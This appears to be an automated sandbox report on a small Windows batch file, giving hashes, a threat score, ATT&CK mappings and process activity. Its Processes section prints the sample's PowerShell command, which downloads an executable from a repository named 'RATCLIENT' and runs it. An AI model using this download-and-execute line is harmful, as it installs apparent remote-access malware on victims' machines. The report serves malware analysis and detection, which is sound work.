Analysis

  • max time kernel
    43s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    30-05-2024 12:57

General

  • Target

    Test.bat

  • Size

    186B

  • MD5

    9c4d95c3db51f66fed113f3f97c634ed

  • SHA1

    4aa3b2737d2883c3546ba198dbfe01354ed280b3

  • SHA256

    624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a

  • SHA512

    ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Test.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command cd C:\Windows mkdir .temp2 Invoke-WebRequest https://github.com/1048discord/RATCLIENT/raw/main/Beta.exe -OutFile Client.exe start Client.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:852

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/852-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp
    Filesize

    4KB

  • memory/852-5-0x000000001B670000-0x000000001B952000-memory.dmp
    Filesize

    2.9MB

  • memory/852-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
    Filesize

    32KB

  • memory/852-7-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp
    Filesize

    9.6MB

  • memory/852-8-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp
    Filesize

    9.6MB

  • memory/852-9-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp
    Filesize

    9.6MB

  • memory/852-10-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp
    Filesize

    9.6MB

  • memory/852-11-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp
    Filesize

    9.6MB